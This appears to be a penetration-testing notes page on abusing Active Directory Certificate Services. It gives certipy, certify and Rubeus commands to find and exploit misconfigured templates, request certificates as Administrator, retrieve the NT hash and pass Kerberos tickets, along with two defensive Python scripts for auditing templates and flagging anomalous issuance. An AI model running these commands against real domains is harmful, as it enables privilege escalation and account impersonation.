Certificate Authority (CA)

Last updated 5 months ago

Enumerate CA for vulnerabilities

Some certificate templates are misconfigured so that the enrollee can supply an arbitrary subject alternative name, which lets a low-privileged user request a certificate for another account. The tools below enumerate the templates and flag the vulnerable ones.

# Using certutil (lists every template with its flags, EKUs and enrollment rights)
certutil -v -dstemplate

# Using certify.exe (locally, on a domain-joined host)
.\certify.exe find /vulnerable

# Using certipy (remotely, over LDAP)
certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
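The tools above apply a fixed set of checks to each template. As an added example (not from these notes or from the certify/certipy projects), the auditor below encodes those checks so the output of `certutil -v -dstemplate` can be reviewed by hand: the field names model the template's LDAP attributes, the flag bits and EKU OIDs are the documented Microsoft values, and both sample templates are constructed.

```python
# Added example, not from the original notes: an auditor for the template
# conditions that let a low-privileged enroller obtain a certificate for an
# arbitrary alternative name (the ESC1 misconfiguration). Field names model the
# LDAP attributes certutil -v -dstemplate prints; the sample values are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def audit_template(t):
    """Return the list of ESC1 conditions this template meets."""
    met = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject/SAN")
    # An empty EKU list means the certificate is valid for any purpose
    if not t["pKIExtendedKeyUsage"] or AUTH_EKUS & set(t["pKIExtendedKeyUsage"]):
        met.append("EKU permits authentication")
    if not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("no manager approval")
    if t["msPKI-RA-Signature"] == 0:
        met.append("no authorized signatures")
    if LOW_PRIV & set(t["enroll"]):
        met.append("low-privileged enrollment rights")
    return met

def is_esc1(t):
    """True only when every condition holds; a single control breaks the chain."""
    return len(audit_template(t)) == 5

# Constructed samples: one misconfigured, one fixed by requiring manager approval
VULN = {"msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-RA-Signature": 0,
        "enroll": ["Domain Users", "Domain Admins"]}
FIXED = {**VULN, "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS}

if __name__ == "__main__":
    for name, tpl in (("VULN", VULN), ("FIXED", FIXED)):
        print(name, is_esc1(tpl), audit_template(tpl))
```

Removing any one of the five conditions (manager approval, a restricted EKU, or enrollment rights limited to an admin group) is enough to close the path, which is why the fixed template reports four conditions but is not flagged.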

Exploiting misconfigured templates

Request a certificate from a vulnerable template:

# Using certipy (older 1.x positional syntax; 4.x uses -u/-p/-ca/-target/-template/-upn as shown in the PKI admins section)
python3 certipy req <domain>/<user>:<password>@<ca_server> <ca_name> -template '<vulnerable_template_name>' -alt '<target_user>'

# Using certify.exe
.\certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable_template_name>" /altname:"<alt_name>"

PKI admins group

If you are a member of the PKI Admins group, you can create your own vulnerable template and use it to impersonate Administrator.

# Requires the ADCSTemplate PowerShell module (https://github.com/GoateePFE/ADCSTemplate)
Import-Module .\ADCSTemplate.psm1
# Clone the "Subordinate Certification Authority" template as "Incendium", publish it and grant PKI Admins enrollment rights
New-ADCSTemplate -DisplayName Incendium -JSON (Export-ADCSTemplate -DisplayName "Subordinate Certification Authority") -publish -Identity "DOMAIN\PKI Admins"

Next we request the template as Administrator:

certipy req -username incendium@domain.local -password PASS123 -ca domain-DC01-CA -target dc.domain.local -template Incendium -upn Administrator@domain.local -dns domain.local

Now we can use the resulting PFX file to authenticate via PKINIT and retrieve the NT hash of Administrator:

certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.1.10 -username 'Administrator' -domain 'domain.local'
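The sequence above leaves two traces a defender can look for: a certificate issued from a template that is not part of the CA's baseline, and a certificate whose SAN names an account other than the one that requested it. As an added example (not from these notes), the check below runs that logic over a constructed export of issued-certificate records; the column layout is an assumption, so map your own CA database export (`certutil -view`) or issuance events onto these three fields.

```python
# Added example, not from the original notes: a detection pass over issued-
# certificate records. The record layout and every sample row are constructed.
import csv
import io

APPROVED_TEMPLATES = {"User", "Machine", "DomainController", "WebServer"}
HIGH_VALUE = {"administrator"}   # accounts whose impersonation should page someone

# Constructed export: requester, template, UPN carried in the SAN (may be empty)
SAMPLE_CSV = """requester,template,san_upn
DOMAIN\\jdoe,User,jdoe@domain.local
DOMAIN\\incendium,Incendium,Administrator@domain.local
DOMAIN\\DC01$,DomainController,
DOMAIN\\bob,User,alice@domain.local
"""

def account_name(principal):
    """'DOMAIN\\user' or 'user@domain' -> 'user' (lower-cased for comparison)."""
    return principal.split("\\")[-1].split("@")[0].lower()

def review_issuance(csv_text):
    """Return a list of (requester, reasons) for records worth an analyst's attention."""
    alerts = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = []
        requester, upn = account_name(row["requester"]), row["san_upn"].strip()
        if row["template"] not in APPROVED_TEMPLATES:
            reasons.append("template not in baseline")
        # A SAN that names a different account is the signature of alt-name abuse
        if upn and account_name(upn) != requester:
            reasons.append("SAN UPN differs from requester")
            if account_name(upn) in HIGH_VALUE:
                reasons.append("SAN names a high-value account")
        if reasons:
            alerts.append((row["requester"], reasons))
    return alerts

if __name__ == "__main__":
    for requester, reasons in review_issuance(SAMPLE_CSV):
        print(requester, "->", "; ".join(reasons))
```

Machine accounts legitimately request certificates with no UPN in the SAN, so an empty SAN is not treated as a mismatch.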

Convert PEM to PFX

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Request ticket

# Request a TGT with the certificate and inject it into the current session
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# If cert.pfx is password-protected, supply the password
Rubeus.exe asktgt /user:Administrator /password:password123 /certificate:cert.pfx /ptt
# Or reference a certificate in the user store by thumbprint and write the ticket to a file
Rubeus.exe asktgt /user:Administrator /certificate:<Thumbprint> /outfile:ticket.kirbi

Pass the ticket

# Convert the Rubeus .kirbi ticket to a ccache usable by Impacket tools
impacket-ticketConverter ticket.kirbi ticket.ccache

The PowerShell module used in the PKI admins section to create the new template is ADCSTemplate: https://github.com/GoateePFE/ADCSTemplate

See also: AD CS Domain Escalation (HackTricks).